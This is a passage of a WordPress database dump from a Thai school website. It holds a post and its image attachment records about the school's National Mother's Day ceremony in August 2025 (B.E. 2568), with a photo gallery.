class=\"wp-image-1986\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1985,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_7-1024x576.jpg\" alt=\"\" class=\"wp-image-1985\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1987,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_6-1024x576.jpg\" alt=\"\" class=\"wp-image-1987\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1989,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_5-1024x576.jpg\" alt=\"\" class=\"wp-image-1989\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1991,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_4-1024x576.jpg\" alt=\"\" class=\"wp-image-1991\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1988,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_3-1024x576.jpg\" alt=\"\" class=\"wp-image-1988\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1992,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_2-1024x576.jpg\" alt=\"\" class=\"wp-image-1992\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1990,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_1-1024x576.jpg\" alt=\"\" class=\"wp-image-1990\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\n\n<!-- wp:paragraph {\"placeholder\":\"Type / to add a hidden block\"} -->\n<p></p>\n<!-- /wp:paragraph --></details>\n<!-- /wp:details -->','กิจกรรม วันแม่แห่งชาติ ปี 2568','','publish','closed','closed','','%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1-%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b9%81%e0%b8%a1%e0%b9%88%e0%b9%81%e0%b8%ab%e0%b9%88%e0%b8%87%e0%b8%8a%e0%b8%b2%e0%b8%95%e0%b8%b4-%e0%b8%9b','','','2025-08-14 10:25:50','2025-08-14 03:25:50','',0,'http://pakhaeng.ssk.in.th/?p=1944',0,'post','',0),
(1945,1,'2025-08-14 10:25:02','2025-08-14 03:25:02','','LINE_ALBUM_12868_250813_46','','inherit','','closed','','line_album_12868_250813_46','','','2025-08-14 10:25:02','2025-08-14 03:25:02','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_46.jpg',0,'attachment','image/jpeg',0),
(1946,1,'2025-08-14 10:25:02','2025-08-14 03:25:02','','LINE_ALBUM_12868_250813_47','','inherit','','closed','','line_album_12868_250813_47','','','2025-08-14 10:25:02','2025-08-14 03:25:02','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_47.jpg',0,'attachment','image/jpeg',0),
(1947,1,'2025-08-14 10:25:02','2025-08-14 03:25:02','','LINE_ALBUM_12868_250813_45','','inherit','','closed','','line_album_12868_250813_45','','','2025-08-14 10:25:02','2025-08-14 03:25:02','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_45.jpg',0,'attachment','image/jpeg',0),
(1948,1,'2025-08-14 10:25:02','2025-08-14 03:25:02','','LINE_ALBUM_12868_250813_44','','inherit','','closed','','line_album_12868_250813_44','','','2025-08-14 10:25:02','2025-08-14 03:25:02','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_44.jpg',0,'attachment','image/jpeg',0),
(1949,1,'2025-08-14 10:25:02','2025-08-14 03:25:02','','LINE_ALBUM_12868_250813_42','','inherit','','closed','','line_album_12868_250813_42','','','2025-08-14 10:25:02','2025-08-14 03:25:02','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_42.jpg',0,'attachment','image/jpeg',0),
(1950,1,'2025-08-14 10:25:02','2025-08-14 03:25:02','','LINE_ALBUM_12868_250813_48','','inherit','','closed','','line_album_12868_250813_48','','','2025-08-14 10:25:02','2025-08-14 03:25:02','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_48.jpg',0,'attachment','image/jpeg',0),
(1951,1,'2025-08-14 10:25:04','2025-08-14 03:25:04','','LINE_ALBUM_12868_250813_43','','inherit','','closed','','line_album_12868_250813_43','','','2025-08-14 10:25:04','2025-08-14 03:25:04','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_43.jpg',0,'attachment','image/jpeg',0),
(1952,1,'2025-08-14 10:25:04','2025-08-14 03:25:04','','LINE_ALBUM_12868_250813_41','','inherit','','closed','','line_album_12868_250813_41','','','2025-08-14 10:25:04','2025-08-14 03:25:04','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_41.jpg',0,'attachment','image/jpeg',0),
(1953,1,'2025-08-14 10:25:04','2025-08-14 03:25:04','','LINE_ALBUM_12868_250813_40','','inherit','','closed','','line_album_12868_250813_40','','','2025-08-14 10:25:04','2025-08-14 03:25:04','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_40.jpg',0,'attachment','image/jpeg',0),
(1954,1,'2025-08-14 10:25:04','2025-08-14 03:25:04','','LINE_ALBUM_12868_250813_38','','inherit','','closed','','line_album_12868_250813_38','','','2025-08-14 10:25:04','2025-08-14 03:25:04','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_38.jpg',0,'attachment','image/jpeg',0),
(1955,1,'2025-08-14 10:25:04','2025-08-14 03:25:04','','LINE_ALBUM_12868_250813_39','','inherit','','closed','','line_album_12868_250813_39','','','2025-08-14 10:25:04','2025-08-14 03:25:04','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_39.jpg',0,'attachment','image/jpeg',0),
(1956,1,'2025-08-14 10:25:04','2025-08-14 03:25:04','','LINE_ALBUM_12868_250813_36','','inherit','','closed','','line_album_12868_250813_36','','','2025-08-14 10:25:04','2025-08-14 03:25:04','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_36.jpg',0,'attachment','image/jpeg',0),
(1957,1,'2025-08-14 10:25:06','2025-08-14 03:25:06','','LINE_ALBUM_12868_250813_35','','inherit','','closed','','line_album_12868_250813_35','','','2025-08-14 10:25:06','2025-08-14 03:25:06','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_35.jpg',0,'attachment','image/jpeg',0),
(1958,1,'2025-08-14 10:25:06','2025-08-14 03:25:06','','LINE_ALBUM_12868_250813_34','','inherit','','closed','','line_album_12868_250813_34','','','2025-08-14 10:25:06','2025-08-14 03:25:06','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_34.jpg',0,'attachment','image/jpeg',0),
(1959,1,'2025-08-14 10:25:06','2025-08-14 03:25:06','','LINE_ALBUM_12868_250813_37','','inherit','','closed','','line_album_12868_250813_37','','','2025-08-14 10:25:06','2025-08-14 03:25:06','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_37.jpg',0,'attachment','image/jpeg',0),
(1960,1,'2025-08-14 10:25:06','2025-08-14 03:25:06','','LINE_ALBUM_12868_250813_33','','inherit','','closed','','line_album_12868_250813_33','','','2025-08-14 10:25:06','2025-08-14 03:25:06','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_33.jpg',0,'attachment','image/jpeg',0),
(1961,1,'2025-08-14 10:25:06','2025-08-14 03:25:06','','LINE_ALBUM_12868_250813_32','','inherit','','closed','','line_album_12868_250813_32','','','2025-08-14 10:25:06','2025-08-14 03:25:06','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_32.jpg',0,'attachment','image/jpeg',0),
(1962,1,'2025-08-14 10:25:06','2025-08-14 03:25:06','','LINE_ALBUM_12868_250813_31','','inherit','','closed','','line_album_12868_250813_31','','','2025-08-14 10:25:06','2025-08-14 03:25:06','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_31.jpg',0,'attachment','image/jpeg',0),
(1963,1,'2025-08-14 10:25:07','2025-08-14 03:25:07','','LINE_ALBUM_12868_250813_29','','inherit','','closed','','line_album_12868_250813_29','','','2025-08-14 10:25:07','2025-08-14 03:25:07','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_29.jpg',0,'attachment','image/jpeg',0),
(1964,1,'2025-08-14 10:25:07','2025-08-14 03:25:07','','LINE_ALBUM_12868_250813_28','','inherit','','closed','','line_album_12868_250813_28','','','2025-08-14 10:25:07','2025-08-14 03:25:07','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_28.jpg',0,'attachment','image/jpeg',0),
(1965,1,'2025-08-14 10:25:08','2025-08-14 03:25:08','','LINE_ALBUM_12868_250813_30','','inherit','','closed','','line_album_12868_250813_30','','','2025-08-14 10:25:08','2025-08-14 03:25:08','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_30.jpg',0,'attachment','image/jpeg',0),
(1966,1,'2025-08-14 10:25:08','2025-08-14 03:25:08','','LINE_ALBUM_12868_250813_26','','inherit','','closed','','line_album_12868_250813_26','','','2025-08-14 10:25:08','2025-08-14 03:25:08','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_26.jpg',0,'attachment','image/jpeg',0),
(1967,1,'2025-08-14 10:25:08','2025-08-14 03:25:08','','LINE_ALBUM_12868_250813_27','','inherit','','closed','','line_album_12868_250813_27','','','2025-08-14 10:25:08','2025-08-14 03:25:08','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_27.jpg',0,'attachment','image/jpeg',0),
(1968,1,'2025-08-14 10:25:08','2025-08-14 03:25:08','','LINE_ALBUM_12868_250813_25','','inherit','','closed','','line_album_12868_250813_25','','','2025-08-14 10:25:08','2025-08-14 03:25:08','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_25.jpg',0,'attachment','image/jpeg',0),
(1969,1,'2025-08-14 10:25:09','2025-08-14 03:25:09','','LINE_ALBUM_12868_250813_23','','inherit','','closed','','line_album_12868_250813_23','','','2025-08-14 10:25:09','2025-08-14 03:25:09','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_23.jpg',0,'attachment','image/jpeg',0),
(1970,1,'2025-08-14 10:25:10','2025-08-14 03:25:10','','LINE_ALBUM_12868_250813_24','','inherit','','closed','','line_album_12868_250813_24','','','2025-08-14 10:25:10','2025-08-14 03:25:10','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_24.jpg',0,'attachment','image/jpeg',0),
(1971,1,'2025-08-14 10:25:10','2025-08-14 03:25:10','','LINE_ALBUM_12868_250813_22','','inherit','','closed','','line_album_12868_250813_22','','','2025-08-14 10:25:10','2025-08-14 03:25:10','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_22.jpg',0,'attachment','image/jpeg',0),
(1972,1,'2025-08-14 10:25:10','2025-08-14 03:25:10','','LINE_ALBUM_12868_250813_21','','inherit','','closed','','line_album_12868_250813_21','','','2025-08-14 10:25:10','2025-08-14 03:25:10','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_21.jpg',0,'attachment','image/jpeg',0),
(1973,1,'2025-08-14 10:25:10','2025-08-14 03:25:10','','LINE_ALBUM_12868_250813_20','','inherit','','closed','','line_album_12868_250813_20','','','2025-08-14 10:25:10','2025-08-14 03:25:10','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_20.jpg',0,'attachment','image/jpeg',0),
(1974,1,'2025-08-14 10:25:10','2025-08-14 03:25:10','','LINE_ALBUM_12868_250813_19','','inherit','','closed','','line_album_12868_250813_19','','','2025-08-14 10:25:10','2025-08-14 03:25:10','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_19.jpg',0,'attachment','image/jpeg',0),
(1975,1,'2025-08-14 10:25:11','2025-08-14 03:25:11','','LINE_ALBUM_12868_250813_18','','inherit','','closed','','line_album_12868_250813_18','','','2025-08-14 10:25:11','2025-08-14 03:25:11','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_18.jpg',0,'attachment','image/jpeg',0),
(1976,1,'2025-08-14 10:25:11','2025-08-14 03:25:11','','LINE_ALBUM_12868_250813_17','','inherit','','closed','','line_album_12868_250813_17','','','2025-08-14 10:25:11','2025-08-14 03:25:11','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_17.jpg',0,'attachment','image/jpeg',0),
(1977,1,'2025-08-14 10:25:11','2025-08-14 03:25:11','','LINE_ALBUM_12868_250813_16','','inherit','','closed','','line_album_12868_250813_16','','','2025-08-14 10:25:11','2025-08-14 03:25:11','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_16.jpg',0,'attachment','image/jpeg',0),
(1978,1,'2025-08-14 10:25:11','2025-08-14 03:25:11','','LINE_ALBUM_12868_250813_15','','inherit','','closed','','line_album_12868_250813_15','','','2025-08-14 10:25:11','2025-08-14 03:25:11','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_15.jpg',0,'attachment','image/jpeg',0),
(1979,1,'2025-08-14 10:25:11','2025-08-14 03:25:11','','LINE_ALBUM_12868_250813_14','','inherit','','closed','','line_album_12868_250813_14','','','2025-08-14 10:25:11','2025-08-14 03:25:11','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_14.jpg',0,'attachment','image/jpeg',0),
(1980,1,'2025-08-14 10:25:12','2025-08-14 03:25:12','','LINE_ALBUM_12868_250813_13','','inherit','','closed','','line_album_12868_250813_13','','','2025-08-14 10:25:12','2025-08-14 03:25:12','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_13.jpg',0,'attachment','image/jpeg',0),
(1981,1,'2025-08-14 10:25:12','2025-08-14 03:25:12','','LINE_ALBUM_12868_250813_12','','inherit','','closed','','line_album_12868_250813_12','','','2025-08-14 10:25:12','2025-08-14 03:25:12','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_12.jpg',0,'attachment','image/jpeg',0),
(1982,1,'2025-08-14 10:25:13','2025-08-14 03:25:13','','LINE_ALBUM_12868_250813_11','','inherit','','closed','','line_album_12868_250813_11','','','2025-08-14 10:25:13','2025-08-14 03:25:13','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_11.jpg',0,'attachment','image/jpeg',0),
(1983,1,'2025-08-14 10:25:13','2025-08-14 03:25:13','','LINE_ALBUM_12868_250813_9','','inherit','','closed','','line_album_12868_250813_9','','','2025-08-14 10:25:13','2025-08-14 03:25:13','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_9.jpg',0,'attachment','image/jpeg',0),
(1984,1,'2025-08-14 10:25:13','2025-08-14 03:25:13','','LINE_ALBUM_12868_250813_10','','inherit','','closed','','line_album_12868_250813_10','','','2025-08-14 10:25:13','2025-08-14 03:25:13','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_10.jpg',0,'attachment','image/jpeg',0),
(1985,1,'2025-08-14 10:25:14','2025-08-14 03:25:14','','LINE_ALBUM_12868_250813_7','','inherit','','closed','','line_album_12868_250813_7','','','2025-08-14 10:25:14','2025-08-14 03:25:14','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_7.jpg',0,'attachment','image/jpeg',0),
(1986,1,'2025-08-14 10:25:14','2025-08-14 03:25:14','','LINE_ALBUM_12868_250813_8','','inherit','','closed','','line_album_12868_250813_8','','','2025-08-14 10:25:14','2025-08-14 03:25:14','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_8.jpg',0,'attachment','image/jpeg',0),
(1987,1,'2025-08-14 10:25:14','2025-08-14 03:25:14','','LINE_ALBUM_12868_250813_6','','inherit','','closed','','line_album_12868_250813_6','','','2025-08-14 10:25:14','2025-08-14 03:25:14','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_6.jpg',0,'attachment','image/jpeg',0),
(1988,1,'2025-08-14 10:25:15','2025-08-14 03:25:15','','LINE_ALBUM_12868_250813_3','','inherit','','closed','','line_album_12868_250813_3','','','2025-08-14 10:25:15','2025-08-14 03:25:15','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_3.jpg',0,'attachment','image/jpeg',0),
(1989,1,'2025-08-14 10:25:15','2025-08-14 03:25:15','','LINE_ALBUM_12868_250813_5','','inherit','','closed','','line_album_12868_250813_5','','','2025-08-14 10:25:15','2025-08-14 03:25:15','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_5.jpg',0,'attachment','image/jpeg',0),
(1990,1,'2025-08-14 10:25:16','2025-08-14 03:25:16','','LINE_ALBUM_12868_250813_1','','inherit','','closed','','line_album_12868_250813_1','','','2025-08-14 10:25:16','2025-08-14 03:25:16','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_1.jpg',0,'attachment','image/jpeg',0),
(1991,1,'2025-08-14 10:25:16','2025-08-14 03:25:16','','LINE_ALBUM_12868_250813_4','','inherit','','closed','','line_album_12868_250813_4','','','2025-08-14 10:25:16','2025-08-14 03:25:16','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_4.jpg',0,'attachment','image/jpeg',0),
(1992,1,'2025-08-14 10:25:16','2025-08-14 03:25:16','','LINE_ALBUM_12868_250813_2','','inherit','','closed','','line_album_12868_250813_2','','','2025-08-14 10:25:16','2025-08-14 03:25:16','',1944,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_2.jpg',0,'attachment','image/jpeg',0),
(1993,1,'2025-08-14 10:25:48','2025-08-14 03:25:48','<!-- wp:details -->\n<details class=\"wp-block-details\"><summary><strong>วันที่ 7 สิงหาคม 2568 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ นำโดย</strong><br><strong>นางเสน่หา พลโสภา ผู้อำนวยการโรงเรียน ได้จัดกิจกรรมวันแม่แห่งชาติ เนื่องในวันเฉลิมพระชนมพรรษา สมเด็จพระนางเจ้าสิริกิติ์ พระบรมราชินีนาถ พระบรมราชชนนีพันปีหลวง เพื่อแสดงความจงรักภักดีแด่องค์สมเด็จพระนางเจ้าสิริกิติ์ พระบรมราชินีนาถ พระบรมราชชนนีพันปีหลวง และเพื่อให้นักเรียนได้แสดงความเคารพ ความกตัญญูกตเวทีต่อผู้มีพระคุณ โดยกิจกรรมประกอบด้วย คณะครู บุคลากร นักเรียนและผู้ปกครอง โดยพิธีเริ่มจากประธานเปิดกรวยธูปเทียนแพร ถวายพุ่มเงิน พุ่มทอง และเปิดกรวยถวายราชสักการะ ลงนามถวายพระพร ประธานกล่าวถวายราชสดุดีเฉลิมพระเกียรติถวายพระพรชัยมงคล สมเด็จพระนางเจ้าสิริกิติ์ พระบรมราชินีนาถ พระบรมราชชนนีพันปีหลวง ทุกคนร่วมร้องเพลงสดุดีพระแม่ไทยและ ร้องเพลงสรรเสริญพระบารมี จากนั้นนักเรียนทุกคนแสดงความรักและกตัญญูต่อแม่ และมอบเกียรติบัตรให้กับแม่ดีเด่นประจำปี 2568 ณ ใต้ถุนอาคาร โรงเรียนบ้านหนองปลาเข็ง กอไหล่</strong></summary><!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1950,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_48-1024x576.jpg\" alt=\"\" class=\"wp-image-1950\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1945,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_46-1024x576.jpg\" alt=\"\" class=\"wp-image-1945\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1946,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_47-1024x576.jpg\" alt=\"\" class=\"wp-image-1946\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1947,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_45-1024x576.jpg\" alt=\"\" class=\"wp-image-1947\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1948,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_44-1024x576.jpg\" alt=\"\" class=\"wp-image-1948\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1949,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_42-1024x576.jpg\" alt=\"\" class=\"wp-image-1949\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1951,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_43-1024x576.jpg\" alt=\"\" class=\"wp-image-1951\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1952,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_41-1024x576.jpg\" alt=\"\" class=\"wp-image-1952\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1953,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_40-1024x576.jpg\" alt=\"\" class=\"wp-image-1953\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1955,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_39-1024x576.jpg\" alt=\"\" class=\"wp-image-1955\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1954,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_38-1024x576.jpg\" alt=\"\" class=\"wp-image-1954\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1956,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_36-1024x576.jpg\" alt=\"\" class=\"wp-image-1956\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1959,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_37-1024x576.jpg\" alt=\"\" class=\"wp-image-1959\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1957,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_35-1024x576.jpg\" alt=\"\" class=\"wp-image-1957\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1958,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_34-1024x576.jpg\" alt=\"\" class=\"wp-image-1958\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1960,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_33-1024x576.jpg\" alt=\"\" class=\"wp-image-1960\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1961,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_32-1024x576.jpg\" alt=\"\" class=\"wp-image-1961\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1962,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_31-1024x576.jpg\" alt=\"\" class=\"wp-image-1962\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1963,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_29-1024x576.jpg\" alt=\"\" class=\"wp-image-1963\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1965,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_30-1024x576.jpg\" alt=\"\" class=\"wp-image-1965\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1964,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_28-1024x576.jpg\" alt=\"\" class=\"wp-image-1964\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1967,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/08/LINE_ALBUM_12868_250813_27-1024x576.jpg\" alt=\"\" class=\"wp-image-1967\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1966,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img 